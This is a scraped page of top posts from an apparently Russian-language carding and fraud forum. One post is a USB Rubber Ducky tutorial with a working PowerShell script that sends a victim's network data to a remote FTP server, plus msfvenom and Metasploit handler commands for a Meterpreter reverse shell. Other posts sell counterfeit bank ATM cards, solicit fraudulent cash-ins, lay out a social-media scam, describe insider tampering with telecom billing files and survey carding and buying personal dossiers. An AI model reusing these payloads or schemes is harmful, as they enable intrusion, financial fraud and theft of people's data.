Перейти к публикации

Таблица лидеров


Популярные публикации

Отображаются публикации с наибольшей репутацией на 27.10.2022 в Сообщения

  1. 2 балла
    Если вы считаете себя топовым соц инженером или же обладаете подвешенным языком, то эта старая но, до сих пор рабочая схема для Вас.
  2. 1 балл
    Бил, бью и буду бить... такова политика партии 😉
  3. 1 балл
    Мобильные операторы получают массу данных и метаданных, по которым можно узнать очень многое о жизни отдельно взятого абонента. А поняв, как обрабатываются и как хранятся эти данные, ты сможешь отследить всю цепочку прохождения информации от звонка до списания денег. Если же говорить о модели внутреннего нарушителя, то здесь возможности и подавно огромные, ведь защита данных вообще не входит в задачи систем предбиллинга. Для начала нужно учитывать, что абонентский трафик в сети телеком-оператора генерируется и поступает с разного оборудования. Это оборудование может формировать файлы с записями (файлы CDR, логи RADIUS, текст в ASCII) и работать по разным протоколам (NetFlow, SNMP, SOAP). И нужно контролировать весь этот веселый и недружный хоровод, снимать данные, обрабатывать и передавать дальше в биллинговую систему в формате, который будет предварительно стандартизован. При этом везде бегают абонентские данные, доступ к которым желательно не предоставлять посторонним. Насколько защищена информация в такой системе с учетом всех цепочек? Давай разбираться. Зачем предбиллинг телеком-операторам? Считается, что абоненты хотят получать все более новые и современные виды услуг, но нельзя постоянно менять для этого оборудование. Поэтому реализацией новых услуг и способами их предоставления должен заниматься предбиллинг — это его первая задача. Вторая — анализ трафика, проверка его корректности, полноты загрузки в абонентский биллинг, подготовка данных для биллинга. С помощью предбиллинга реализованы различные сверки и дозагрузки данных. Например, сверка состояния услуг на оборудовании и в биллинге. Бывает, абонент пользуется услугами при том, что в биллинге он уже заблокирован. Либо он пользовался услугами, но с оборудования не поступили записи об этом. Ситуаций может быть множество, большинство таких моментов и решается с помощью предбиллинга. Когда-то я писал курсовую работу по оптимизации бизнес-процессов компании и расчету ROI. Проблема с расчетом ROI была не в том, что не было исходных данных, — я не понимал, какой «линейкой» их мерить. Примерно так же часто бывает с предбиллингом. Можно бесконечно настраивать и улучшать обработку, но всегда в какой-то момент обстоятельства и данные сложатся так, что произойдет исключение. Можно идеально выстроить систему работы и мониторинга вспомогательных систем биллинга и предбиллинга, но невозможно обеспечить бесперебойную работу оборудования и каналов передачи данных. Поэтому и существует дублирующая система, которая занимается проверкой данных в биллинге и данных, ушедших от предбиллинга в биллинг. Ее задача — поймать то, что ушло с оборудования, но по какой-то причине «не легло на абонента». Эту роль дублирующей и контролирующей предбиллинг системы обычно играет FMS — Fraud Management System. Конечно, ее основное предназначение — вовсе не контроль предбиллинга, а выявление мошеннических схем и, как следствие, мониторинг потерь и расхождений данных с оборудования и биллинговых данных. На самом деле вариантов использования предбиллинга очень много. Например, это может быть выполнение сверки между состоянием абонента на оборудовании и в CRM. Такая схема может выглядеть следующим образом. С помощью предбиллинга по SOAP получаем данные с оборудования (HSS, VLR, HLR, AUC, EIR). Преобразуем исходные RAW-данные в нужный формат. Делаем запрос в смежные системы CRM (базы данных, программные интерфейсы). Производим сверку данных. Формируем записи-исключения. Делаем запрос в систему CRM на синхронизацию данных. Итог — абонент, качающий фильм в роуминге в ЮАР, блокируется с нулевым балансом и не уходит в дикий минус. Еще один пример использования — накопление данных и дальнейшая их обработка. Такой вариант возможен, когда у нас тысячи записей с оборудования (GGSN-SGSN, телефония): выбрасывать все эти записи в детализацию абонента — полнейшее безумие, не говоря уже о том, что мы адски нагружаем все системы таким количеством мелких данных. По этой причине подойдет следующая схема, которая разрешает проблему. Получение данных с оборудования. Агрегация данных на предбиллинге (ждем, когда соберутся все нужные записи по какому-либо условию). Отправка данных в конечный биллинг. Итог — вместо 10 тысяч записей мы отправили одну с агрегирующим значением счетчика потребленного интернет-трафика. Сделали всего один запрос к базе данных и сэкономили кучу ресурсов, включая электричество! Это всего лишь типовые схемы работы. Формат статьи не позволяет привести примеры более сложных схем (например, Big Data), но они тоже встречаются. Как усмирить зоопарк? Чтобы было понятнее, как это работает и где здесь могут возникнуть проблемы, давай возьмем систему предбиллинга Hewlett-Packard Internet Usage Manager (HP IUM, в обновленном варианте eIUM) и на ее примере посмотрим, как работает подобный софт. Представь большую мясорубку, в которую бросают мясо, овощи, буханки хлеба — все, что только можно. То есть на входе самые разные продукты, но на выходе все они приобретают одинаковую форму. Мы можем поменять решетку и получим на выходе другую форму, но принцип и путь обработки наших продуктов останется прежний — шнек, нож, решетка. Это и есть классическая схема предбиллинга: сбор, обработка и вывод данных. В предбиллинге IUM звенья этой цепочки называются encapsulator, aggregator и datastore. Тут необходимо понимать, что на входе у нас должна присутствовать полнота данных — некий минимальный объем информации, без которого дальнейшая обработка бесполезна. При отсутствии какого-то блока или элемента данных мы получаем ошибку или предупреждение, что обработка невозможна, так как операции не могут быть выполнены без этих данных. Поэтому очень важно, чтобы оборудование формировало файлы-записи, которые имели бы строго определенный и установленный производителем набор и тип данных. Каждый тип оборудования — отдельный обработчик (коллектор), который работает только со своим форматом входных данных. Например, нельзя просто так взять и закинуть файл с оборудования CISCO PGW-SGW с интернет-трафиком мобильных абонентов на коллектор, который обрабатывает поток с оборудования фиксированной связи Iskratel Si3000. Если мы так сделаем, то в лучшем случае получим исключение при обработке, а в худшем у нас встанет вся обработка конкретного потока, так как обработчик-коллектор упадет с ошибкой и будет ждать, пока мы не решим проблему с «битым» с его точки зрения файлом. Здесь можно заметить, что все системы предбиллинга, как правило, критично воспринимают данные, на обработку которых не был настроен конкретный обработчик-коллектор. Изначально поток разобранных данных (RAW) формируется на уровне энкапсулятора и уже здесь же может быть подвергнут преобразованиям и фильтрации. Так делается, если нужно до схемы агрегации произвести с потоком изменения, которые должны быть в дальнейшем применены ко всему потоку данных (когда он будет проходить через различные схемы агрегации). Файлы (.cdr, .log и прочие) с записями об активности пользователей-абонентов поступают как с локальных источников, так и с удаленных (FTP, SFTP), возможны варианты работы и по другим протоколам. Разбирает файлы парсер, с помощью разных классов Java. Так как система предбиллинга в нормальном режиме работы не предназначена для хранения истории обрабатываемых файлов (а их может быть сотни тысяч в сутки), то после обработки файл на источнике удаляется. По разным причинам файл не всегда может быть удален корректно. В результате бывает, что записи из файла обрабатываются повторно или с большим опозданием (когда удалить файл получилось). Для предотвращения таких дублей существуют механизмы защиты: проверка на дубли файлов или записей, проверка на время в записях и прочее. Одно из самых уязвимых мест здесь — это критичность к размеру данных. Чем больше мы храним данных (в памяти, в базах данных), тем медленнее мы обрабатываем новые данные, тем больше мы потребляем ресурсов и в итоге все равно достигаем предела, после которого вынуждены удалить старые данные. Таким образом, для хранения этих метаданных обычно используются вспомогательные БД (MySQL, TimesTen, Oracle и так далее). Соответственно, получаем еще одну систему, которая влияет на работу предбиллинга с вытекающими вопросами безопасности. Что в черном ящике? Когда-то на заре подобных систем использовались языки, которые позволяли эффективно работать с регулярными выражениями, — таким, например, был Perl. Фактически почти весь предбиллинг, если не брать во внимание работу с внешними системами, — это правила разбора-преобразования строк. Естественно, лучше регулярных выражений тут ничего не найти. Постоянно растущий объем данных и повышение критичности к времени вывода новой услуги на рынок сделали применение таких систем невозможным, так как тестирование и внесение изменений занимало много времени, масштабируемость была низкой. Современный предбиллинг — это набор модулей, как правило написанных на Java, которыми можно управлять в графическом интерфейсе с помощью стандартных операций копирования, вставки, перемещения, перетаскивания. Работа в этом интерфейсе проста и понятна. Для работы в основном используется операционная система на базе Linux или Unix, реже — Windows. Основные проблемы обычно связаны с процессом тестирования или выявления ошибок, так как данные проходят по множеству цепочек правил и обогащаются данными из других систем. Видеть, что происходит с ними на каждой стадии, не всегда удобно и понятно. Поэтому приходится искать причину, отлавливая изменения нужных переменных при помощи логов. Слабость этой системы — ее сложность и человеческий фактор. Любое исключение провоцирует потерю данных или неправильное их формирование. Обрабатываются данные последовательно. Если на входе у нас ошибка-исключение, которая не позволяет корректно принять и обработать данные, встает весь входной поток либо порция некорректных данных отбрасывается. Разобранный RAW-поток поступает на следующую стадию — агрегацию. Схем агрегации может быть несколько, и они изолированы друг от друга. Как если единый поток воды, поступающий в душ, пройдя через решетку лейки, разделится на разные потоки — одни толстые, другие совсем тонкие. После агрегации данные готовы к доставке потребителю. Доставка может идти как напрямую в базы данных, так и записью в файл и отправкой его дальше либо просто записью в хранилище предбиллинга, где они будут лежать, пока его не опустошат. После обработки на первом уровне данные могут передаваться на второй и далее. Такая лестница необходима для увеличения скорости обработки и распределения нагрузки. На второй стадии к нашему потоку данных может добавляться другой поток, смешиваться, делиться, копироваться, объединяться и так далее. Конечная стадия — это всегда доставка данных в системы, которые его потребляют. В задачи предбиллинга не входит (и это правильно!): мониторить, поступили и доставлены ли входные-выходные данные, — этим должны заниматься отдельные системы; шифровать данные на любой стадии. Далеко не весь поток поступающих данных подвергается обработке. Обрабатываются только те данные, которые нужны для работы. Тратить время на остальные нет смысла до того момента, пока они не понадобятся. Таким образом, из RAW-потока нужно брать только то, что нужно для схем агрегации. Из RAW (текстовые файлы, результаты запросов, бинарные файлы) парсится только необходимое. Приватность Здесь у нас полный расколбас! Начнем с того, что в задачи предбиллинга не входит защита данных в принципе. Разграничение доступа к предбиллингу нужно и возможно на разных уровнях (интерфейс управления, операционная система), но если мы заставим его заниматься шифрованием данных, то сложность и время обработки настолько увеличатся, что это будет совершенно неприемлемо и непригодно для работы биллинга. Зачастую время от использования услуги до отображения этого факта в биллинге не должно превышать нескольких минут. Как правило, метаданные, которые нужны для обработки конкретной порции данных, хранятся в БД (MySQL, Oracle, Solid). Входные и выходные данные практически всегда лежат в директории конкретного потока-коллектора. Поэтому доступ к ним может иметь любой, кому он разрешен (например, root-пользователь). Сама конфигурация предбиллинга с набором правил, сведениях о доступах к базам данных, FTP и прочему хранится в зашифрованном виде в файловой базе данных. Если неизвестен логин-пароль для доступа в предбиллинг, то выгрузить конфигурацию не так просто. Любое внесение изменений в логику обработки (правила) фиксируется в лог-файл конфигурации предбиллинга (кто, когда и что менял). Даже если внутри предбиллинга данные передаются по цепочкам обработчиков-коллекторов напрямую (минуя выгрузку в файл), данные все равно временно хранятся в виде файла в директории обработчика, и при желании к нему можно получить доступ. Данные, которые проходят обработку на предбиллинге, обезличены: они не содержат ФИО, адресов и паспортных данных. Поэтому даже если ты получишь доступ к этой информации, то персональных данных абонента отсюда не узнать. Зато можно поймать какую-то инфу по конкретному номеру, IP либо другому идентификатору. Имея доступ к конфигурации предбиллинга, ты получаешь данные для доступа ко всем смежным системам, с которыми он работает. Как правило, доступ к ним ограничен непосредственно с сервера, на котором работает предбиллинг, но так бывает не всегда. Если ты доберешься до директорий, где хранятся файловые данные обработчиков, то сможешь вносить изменения в эти файлы, которые ждут своей отправки потребителям. Часто это самые обычные текстовые документы. Тогда картина такая: предбиллинг данные принял и обработал, но в конечную систему они не пришли — пропали в «черной дыре». И выяснить причину этих потерь будет сложно, так как потеряна только часть данных. В любом случае эмулировать потерю будет невозможно при дальнейшем поиске причин. Можно посмотреть данные на входе и выходе, но понять, куда они делись, не получится. Злоумышленнику при этом остается только замести следы в операционной системе.
  4. 1 балл
    Как первому скидки будут ? или может быть за отзыв пару сканов ?)
  5. 1 балл
  6. 1 балл
    Сегодня правительству не нужно тратить миллионы на хакерские инструменты, чтобы получить требуемые данные с нужных смартфонов. Мысль об этом в последнее время не дает покоя многим пользователям, которые привыкли уделять повышенное внимание своей конфиденциальности. Более того, то и дело мы слышим о появлении специальных приложений, позволяющих шпионить за своими близкими. Как говорят специалисты, теперь даже ваша бабушка может оказаться шпионом. Гипербола, скажете вы? Попробуем разобраться. Содержание: Введение. Использование нескольких шпионских программ приводит к хорошим результатам. Бабушка-шпион — гипербола или нет? Насколько распространены шпионские программы в последнее время. Выводы. Введение Совсем недавно экспертам компании Lookout удалось раскрыть масштабную операцию шпионажа за владельцами мобильных устройств, в ходе которой использовалась дешевая, но весьма мощная вредоносная программа. Этот зловред собирал данные с iPhone и Android-устройств. Предполагаемые разработчики работали над шпионскими программами как для правительственных служб, так и для гражданских лиц. Так появился инструмент под названием TheOneSpy, он настолько прост, что даже ваша бабушка смогла бы им пользоваться. TheOneSpy вполне может применяться для слежки за родственниками. И таких программ много. Задолго до появления TheOneSpy, в декабре 2016 года, шпионская программа для Android StealthAgent использовалась в атаке на известного активиста Дьепа Саиды. У StealthAgent и TheOneSpy прослеживаются сходства в реализации возможностей, утверждают специалисты. «Такой расклад демонстрирует, насколько успешно киберпреступники могут действовать, при этом не инвестируя в кастомные эксплойты», — написал по этому поводу эксперт Lookout Майкл Флоссман. Использование нескольких шпионских программ приводит к хорошим результатам Ранее в этом году исследователи наткнулись на две формы вредоносных программ. Первая из них предназначалась для мобильной операционной системы Android, получила имя Stealth Mango. Вторая, Tangelo, атаковала iOS. Совместно этим вредоносам удалось собрать до 30 Гбайт конфиденциальных данных. В руки стоящих за этими программами киберпреступников попали фотографии военных и правительственных чиновников. Злоумышленники допустили лишь одну ошибку — они оставили открытым доступ к серверу, на котором хранилась вся эта информация, причем пароль для доступа не требовался. В результате этой оплошности исследователям удалось изъять внутреправительственные переговоры, записи звонков, местоположения устройств, текстовые сообщения, фотографии оружия и паспортов. Как видите, информация крайне чувствительная. Шпионская программа для Android действовала более агрессивно, чем вариант для iOS. Одной из интересных возможностей Stealth Mango была способность определять, когда жертва была за рулем, на это время программа отключала передачу данных по Сети, а также получение SMS-сообщений. Кроме этого, Stealth Mango определял местоположение устройства, а во время вызовов шпион мог контролировать фронтальную и основную камеры, а также отслеживать журналы вызовов и текстовых сообщений. Дошло до того, что корпорация Google включилась в борьбу со Stealth Mango, добавив специальные защитные функции в свою операционную систему Android. Инструмент Tangelo для iOS не являлся копией Stealth Mango, однако сходства между двумя этими шпионами все же имелись. Как в случае с практически каждой программой такого класса для iPhone, Tangelo требует наличия джейлбрейка, это значит, что шпионской программе необходимо получить доступ к защищенным корпорацией Apple местам операционной системы. После получения такого доступа Tangelo будет охотиться за базами данных таких приложений, как WhatsApp, Viber, Skype и Line. Метаданные многих фотографий на сервере злоумышленников говорили о том, что они были сделаны на камеру iPhone, следовательно, Tangelo приняла немаловажное участие в крупной утечке данных. Специалисты отметили, что у киберпреступников в некоторых случаях, предположительно, был физический доступ к телефонам жертв. Этот вывод эксперты сделали, отследив цепочку, согласно которой шпионская программа устанавливалась в различных мастерских по ремонту смартфонов, которые возвращали жертве уже зараженное устройство. Помимо этого, злоумышленникам также помогла социальная инженерия, которой преступники активно пользовались, пытаясь заставить пользователя выполнить нужную им последовательность действий. Бабушка-шпион — гипербола или нет? Теперь самое интересное — стоящие за TheOneSpy разработчики также связаны с инструментами Stealth Mango и Tangelo. TheOneSpy преподносится как «самое продвинутое приложение для слежки в мире», оно якобы позволяет «вести тайный мониторинг всей активности на устройствах Android, iPhone, Microsoft Windows и Apple Mac». Как заявляют в TheOneSpy, их услугами пользуются 200 000 клиентов, которых ни разу не удалось обнаружить во время слежки. Именно так звучит слоган TheOneSpy, который озвучивается в соответствующем ролике на YouTube: «Даже ваша бабушка сможет успешно шпионить за владельцем любого телефона». TheOneSpy очень похож на другую шпионскую программу — FlexiSpy, которая была задействована в правительственном шпионаже. Исследователям удалось выйти на разработчиков TheOneSpy, ими оказались пакистанцы, работающие в компаниях Appstertech и Ox-i-Gen. Сложно сказать, насколько оправдан слоган TheOneSpy, однако чем проще шпионская программа будет в использовании, тем больше найдется желающих ей воспользоваться. При должном уровне заинтересованности в мониторинге активности своих родственников даже бабушка вполне сможет организовать шпионскую деятельность, установив простое приложение. Насколько распространены шпионские программы в последнее время Если опираться на различные отчеты все той же Lookout, не раз упомянутой здесь, то можно представить приблизительную картину распространенности этого вида вредоносных программ. Возьмем, к примеру, мессенджер Dardesh, вполне легитимно распространяющийся через официальный магазин Google Play. Dardesh после установки автоматически загружает второе приложение, которое собирает пользовательские данные. Этот мессенджер обнаружили исследователи Lookout, которые утверждали, что приложение принадлежит к группе вредоносных программ Desert Scorpion. Более того, Dardesh рекламировался в одном из профилей на Facebook. Для iOS были похожие свои экземпляры. Например, приложение о погоде AccuWeather собирало данные о пользователях и передавало их компании Reveal Mobile, которая занимается монетизацией информации о местоположении. Причем передача данных осуществлялась даже в тех случаях, когда приложение не получало на это согласия. Специалист отметил, что за 36 часов наблюдений AccuWeather отправило информацию в RealMobile в общей сложности 16 раз. В этом месяце Lookout сообщили об обнаружении одного из самых сложных образцов шпионской программы для мобильных устройств — Chrysaor. В течение трех лет этот вредонос оставался незамеченным для исследователей и пользователей, это было обусловлено его возможностями самоуничтожения. Шпион Chrysaor использовался в целевых атаках на активистов и журналистов. Различные киберпреступные группировки правительственного уровня также привыкли использовать шпионские программы. Правда, там и класс самих программ и схемы разительно отличаются — видна рука профессионалов. Из известных случаев можно вспомнить, как знаменитая группа Fancy Bear использовала антивор для ноутбуков LoJack для кибершпионажа. LoJack для ноутбуков (LoJack for Laptops) — специально разработанный инструмент, помогающий отслеживать и блокировать украденные ноутбуки. LoJack помогает удаленно блокировать и отслеживать местоположение украденного ноутбука, а также удалять на нем все файлы. В первую очередь это решение предназначено для корпоративных ИТ-сред, которые обеспокоены кражей офисного оборудования, на котором могут храниться важные разработки. В какой-то момент специалисты обратили внимание, что несколько исполняемых файлов LoJack обменивались данными с серверами, которые, предположительно, находятся под контролем Fancy Bear. В опубликованном Arbor Networks отчете утверждается, что пять исполняемых файлов приложения LoJack (rpcnetp.exe) связываются с четырьмя подозрительными серверами C&C. Трое из этих серверов в прошлом были связаны с Fancy Bear. Эксперты утверждали, что киберпреступники могли модифицировать копии LoJack, внедрив туда бэкдор. Таким образом, программа превращается в инструмент для шпионажа. Также можно вспомнить шпионскую программу Fauxpersky, авторы которой поступили оригинально, замаскировав свой зловред под Kaspersky Internet Security 2017. Fauxpersky написан на AutoIT или AutoHotKey, простых инструментах для написания небольших программ, преимущественно предназначенных для автоматизирования задач в Windows. Этот вредонос отслеживал нажатия клавиш в активном окне, записывая их в текстовый файл, а затем передавая злоумышленникам. А в марте стало известно, что шпионская программа Slingshot использовалась правительством США. Целью этой кибероперации были различные террористические организации, которые пользовались интернет-кафе для связи с командующими лицами. Эксперты уверены в том, что факт раскрытия Slingshot носит негативный характер, так как это могло привести к потере ценной для военных информации. А в начале года СБУ заблокировала следящую за гражданами Украины вредоносную программу. Вредонос, как сообщалось, собирал данные с телефонов украинцев. Установленный на телефон шпион перехватывал телефонные разговоры, СМС и ММС-переписки, а также сообщения в различных популярных мессенджерах. Также фиксировалась геопозиция жертвы. Выводы А выводы, к сожалению, следуют неутешительные. Современный уровень развития различных программ позволяет создавать крайне простые в использовании инструменты для шпионажа. В погоне за клиентом некоторые конторы и в самом деле создают шпионские программы, которыми могла бы воспользоваться ваша бабушка. Прибавим сюда еще потенциальную заинтересованность спецслужб в сборе определенной информации о гражданах — получим полный комплект паранойи. Однако мы бы не рекомендовали придавать большое значение развивающейся киберугрозе в виде шпионских программ, так как частная жизнь постепенно становится довольно размытым понятием и без них.
  7. 1 балл
    сделать и как можно его применить. Сразу скажу, что сюжетов существует много и достаточно посмотреть на количество возможных вариантов. Они есть как под разные операционные системы, так и под задачи. Рассмотрим как на практике работают некоторые из них и как их можно использовать. Советую прочитать прошлые части Как сделать USB ducky? USB Ducky + WiFi Ducky Нужно понимать, что такого ряда атаки проводятся, когда у вас есть возможность каким-то образом передать или доставить наше устройство для жертвы. Я писал, что можно заказать флешку и упаковать наше чудо в небольшой и приятный корпус, который не будет вызывать подозрений. Удаленное получение информации о сети с PowerShell Что нам нужно: USB WiFi Ducky (связка Arduino Micro Pro и Wemos mini d1); Удаленный сервер с установленным FTP-сервером; Мобильное устройство. Базой нашего скрипта будут команды, которые позволяют получить информацию о сети. Очень подробно они описаны здесь. В нашем примере используем Get-NetIPConfiguration, аналог всем известной командыipconfig в командной строке Windows. Если вам нужно доработать скрипт или заточить под свои нужды, то посмотрите информацию по ссылке выше. Загрузка данных о сети нашей цели будет осуществляться на удаленный FTP-сервер. Для примера был выбран Golden FTP Server. Его также можно использовать и на локальной машине. Вы понимаете, что для серьезных задач нам нужен выделенный FTP-сервер. FTP Server Нажимаем “Добавить” и указываем путь для доступа к файлам. Ставим галочку “Разрешить полный доступ”. Приступаем к скрипту: ############################################ Get-NetIPConfiguration > ipdata.txt; #указываем файл для записи данных о сети $Dir="ipdata.txt" #указываем директорию FTP-сервера $ftp = "ftp://<FTP>" #указываем адрес FTP-сервера (текст в скобочках заменяется на адрес сервера) $webclient = New-Object System.Net.WebClient foreach($item in (dir $Dir "*.trc")){"uploading";$uri = New-Object System.Uri($ftp+$item.Name);$webclient.UploadFile($uri, $item.FullName)} #код для записи файла на сервер. Цикл foreach записан в строку del ipdata.txt #удаляем исходный файл с данными о сети ############################################ Скрипт можно предварительно протестировать на работоспособность в PowerShell. Далее перепишем скрипт в виде команд Ducky Script: GUI r DELAY 100 STRING powershell ENTER DELAY 1000 STRING Get-NetIPConfiguration > ipdata.txt;$Dir="ipdata.txt";$ftp = "ftp://127.0.0.1/F/";$webclient = New-Object System.Net.WebClient; ENTER STRING foreach($item in (dir $Dir "*.trc")){"uploading";$uri = New-Object System.Uri($ftp STRING + STRING $item.Name);$webclient.UploadFile($uri, $item.FullName)} ENTER STRING del ipdata.txt ENTER DELAY 100 STRING exit ENTER Также стоит отметить, что на разных компьютерах стоит использовать разные значения DELAY, то есть задержки между выполнением команд. С этим нужно экспериментировать. В ходе использования скрипта файл с информацией о сети передается на ваш FTP-сервер и удаляется с компьютера жертвы. Пример отчета можно увидеть на скриншоте. Файл с нашими данными ipdata.txt: Информация о жертве ipdata.txt Meterpreter С помощью USB Rubber Ducky мы можем использовать не только написанные на Ducky сценарии, но и загружать исполняемые файлы, которые смогут действовать сами по себе. Именно эту возможность мы разберем. Итак, для атаки нам понадобится: Машина под управлением Linux с установленным Metasploit Framework и Apache (лучше использовать выделенный сервер); Arduino Micro Pro в связке с Wemos mini d1, с установленной прошивкой для эксплуатации Ducky-скриптов; Машина под управлением Windows с поддержкой Powershell; Мобильное устройство с поддержкой WiFI. Итак, начнем. Шаг 1. Создание payload Для начала узнаем IP-адрес нашей машины с помощью команды ifconfig. Как видим, наш адрес — 192.168.0.x Создадим исполняемый файл .exe с помощью команды: msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.100 lport=5555 -f exe > / root/Desktop/reverse_tcp.exe После ввода команды получаем результат: После этого в папке root/Desktop создастся нужный файл. Шаг 2. Конфигурирование веб-сервера Запустим веб-сервер Apache 2 с помощью команды: service apache2 start Скопируем файл reverse_tcp.exe в директорию сервера: var/www/html Дальше проверяем работу сервера: введя свой IP в адресной строке браузера, увидим что-то похожее: Шаг 3. Работа с WiFi USB Ducky На данном этапе мы используем непосредственно нашу “уточку”. Для начала, взглянем на скрипт по ссылке. Желательно его отредактировать, убрав лишние пробелы и комментарии. После этого заменяем "service.jar" на название нашего payload, и IP-адрес на адрес нашего компьютера. Подключаем устройство, подключаемся к точке доступа “уточки” и загружаем полученный скрипт: Шаг 4. Атака Нажимаем на кнопку “Run Script”. На компьютере жертвы запускается окно “Выполнить”, затем вызов Powershell в фоновом режиме. После этого исполняемый файл с нашего сервера скачивается, запускается и закрывается процесс Powershell. Чтобы контролировать компьютер жертвы с управляющей машины, вводим команду msfconsole. После загрузки фреймворка выполняем такую последовательность команд: msf > use exploit/multi/handler msf exploit(handler) > set payload windows/meterpreter/reverse_tcp msf exploit(handler) > set lport 5555 msf exploit(handler) > exploit Если payload на компьютере жертвы сработал, вы увидите такую картину: После установки подключения вы сможете использовать все возможности платформы. Заключение Вот такими способами можно применять уточку. Также я хочу сказать, что можно использовать технологию загрузки с сервиса для других задач. Конечно, для проведения хорошей атаки нужно поработать с нагрузкой. Так как она обнаруживается антивирусами и поэтому имеет далеко не стопроцентный шанс. Но с использованием навыков СИ, например отправить сообщение в критичный момент для цели, может отлично сработать.
  8. 1 балл
    Приму залив! Пишите в телеграмм Templar177
  9. 1 балл
    Всех приветсвую! Пердлогаю дебетовы АТМ карты Украины! В наличии имеються: Приват, А-банк, Дельта банк, Альфа банк, ПУМБ, VAB-банк, Юникредит, Правекс, Аваль, Русский стандарт, Сбербанк России, OTP-банк, Ощадбанк! Любые другие банки изготовим в течении суток БЕЗ предоплат!!! Цена 100-250$ за карту! Работаем исключительно через гаранта данного форума, предоплат не берем, с проверенными пользователями можем сработать по постоплате (получили, проверили материал, потом оплатили)!!! Высылаем карты по Украине и по России! Имееться много положительных отзывов!!!
  10. 1 балл
    Наш подписчик и участник форкс чата разработал свою схему, по которой можно заработать себе на пивко и семки. Далее с его слов. Я начал разрабатывать систему по заработку, она очень проста, но больше 1000 в день не заработаешь. Итак, нам понадобятся: Минимум 3 странички ВКонтакте Qiwi кошелёк Любой фоторедактор; Так вот, мы будем брать с людей небольшую сумму за наши услуги. Схема очень проста. На скриншотах, которые я скину после написания текста будет всё ясно. Вложения не нужны никакие, развод людей на стикеры от официальных групп очень прост, мало кто знает, что если скинуть в личные сообщения паблика какого-нибудь спортмастера или другой официальной группы(не все отвечают) ссылку на свою запись и попросить оставить комментарий, то они оставляют там стикер. Надо сделать как минимум 10 таких сиикеров на одной записи, после чего привлекать внимание людей в комментариях какого-нибудь форча такими фоточками которые я потом скину. Люди ведутся, спрашивают в личке как ты так сделал, ты отвечаешь что за некую сумму сделаешь один такой комментарий(я делал за 100 руб, хоть это очень мало), дальше просто скидываем в официальные группы ссылки на их записи и они их их оставляют (можно ждать даже 12 часов), клиент скидывает деньги и готово! Спрашивается, зачем фейк аккаунты? Просто некоторые группы, например, "Партия ЯБЛОКО" оставляет комментарий только один раз, кроме этой группы такого поведения не наблюдал.
  11. 1 балл
    1. Мошенники в сети интернет Данный вид мошенников - это чума интернета. Мошенники есть везде, на каждом сайте. А в социальных сетях их пруд пруди. Т.к. их много, все они отличаются. Около 90% мошенников в социальных сетях - это школьники. Да да. Именно школьники, которые думают, что если кинуть человека на 100 рублей, то ничего не будет. В основном, данные особи "разводят по тупому". Самый популярный развод - это договорные матчи. Особь заходит на паблик со ставками, новостями спорта и т.д., выбирает жертву и пишет текст примерного содержания "Привет, есть инфа о договорных матчах. Каждую неделю есть матчи, цена ХХХХ, первый даю на проверку". Если отвечаете что заинтересованы - особь кидает матч, а так же "точный счёт матча", например, Динамо - СКА 2:1. Пишет особь многим людям, и конечно же, даёт разные исходы. Кому-нибудь попадается точный счёт, а далее идёт покупка второго. Тут всё понятно. Особь может не писать вам в ЛС, сейчас новый способ - лайк\репост вашей записи со страницы красивой девушки. Вы сами заходите на страницу особи и смотрите предложение. Второй вид - обычные. Это простые люди, захотевшие халявы. Могут кидануть вас на что угодно. Достаточно увидеть ваши товары (если есть), объявление о покупке\продаже и т.д. Кидают на доставку, товар. Такие люди тоже приматы, как и разводилы на "пополнение счёта". Не стоит о них много говорить. Так же есть самые опасные мошенники в соц. сетях - "друзья" и "любовь". Этот вид мошенников достаточно терпелив. Они втираются в доверие через игру (играете вместе в браузерку и т.д.), отношения (знакомства и т.д.). Могут вести себя нормально долгое время. Встречались такие, кто разводил через 2 года общения. Такие люди ведут активную жизнь в соц. сетях. Одновременно могут общаться с десятками людей. В определённый момент отношения просят что-нибудь купить или оплатить. Самое популярное сейчас - билеты в театр, покупка лекарств маме\бабушке и т.д. Суть: девушка пишет парню, они начинают общаться. Через пару дней\недель она намекает на встречи, а-ля хватит сидеть в ВК, давай в живую встретимся. Парень соглашается. Девушка говорит, что хочет в театр, и есть хороший сайт, где можно купить билеты дешевле. Хорошие билеты стоят дорого, а на сайте скидки до 50%. Кидает ссылку, парень покупает, и... в общем-то всё. Девушка пропадает. Парень только потом понимает, что сайт фейк. С лекарствами почти тоже самое. Девушка назначает встречу, а в последний момент у неё проблемы, срочно нужны деньги для лекарства дорогого, ведь бабка коньки отбросит. Сама купить не может, т.к. "тут любая причина". Скидывает фейк сайт. Говорит, что всё с сайта привозит курьер, оплата ему. Делает заказ, приезжает курьер, отдаёт флаконы с водой и уезжает. Классика. В сети много мошенников. Эти способы самые ходовые. 2. Слив ваших данных Господа, 21 век - век компьютерных технологий. Кредитовые, дебетовые карты есть практически у всех. А значит, работы для кардеров хоть отбавляй (кардеры - это современные "Робин Гуды", как себя они называют). Вы можете не знать, но потом окажется, что ваши данные были использованы для отмывания денег, заказов услуг, посылок, кредитов и т.д. В даркнете можно купить 100 паспортов за 500 рублей (дада), а можно вообще получить бесплатно, если по ним уже всё отработали. А откуда берут продавцы в даркнете? Тут всё гораздо труднее. Это могут быть сканы, которые люди скидывали для регистраций в букмекерских конторах, для оформления кредитов и т.д. Взламывают базы данных и вытягивают нужное. Зачастую, можно найти "полный комплект" данных. Там и паспорт, и водительское, и страховая, и аттестат, и даже грамоты за 10 класс. Уверяю вас, защита в банках не такая уж и сильная. Ваши данные легко становятся не вашими. В даркнете можно купить данные чужих банковских карт всего за пару баксов. Проверить карту на баланс тоже легко. Откуда ваши карты у мошенников? Ну тут много вариантов: недобросовестные кассиры, взлом базы данных интернет-магазинов (около 70%), взлом БД банка (очень редко, там другой уровень защиты, нежели в магазинах), скиммеры (в самом банкомате), прозвоны банков, трояны на сайтах и многое другое. Защититься очень сложно, тем более, что кардинг становится всё более популярным. Но хочу обрадовать вас - в СНГ данные воруют не часто. Ведь первое правило кардинга - никому не рассказывать о кардинге не работать по СНГ. Это из-за того, что ловят очень часто. Все привыкли работать по Америке, Европе, Азии. Т,к. там это обычно дело, и ответственность несут банки, а не владельцы карт. У нас же, наоборот. Очень часто "виноваты сами владельцы". Ещё немного о даркнете - "пробив" человека, т.е. полное досье, стоит от 200 до 1000 рублей. Там и адрес, и родственники, и машины, и кредитная линия. Зачастую, такую информацию предоставляют сотрудники полиции, желая подзаработать... Там же и отрисовка любых документов, взломы страничек ВК, продажа товаров со скидками (краденое), скидки на отели, авиабилеты, жд билеты, и даже поддельные документы гос. служащих (от оригинала почти не отличить). 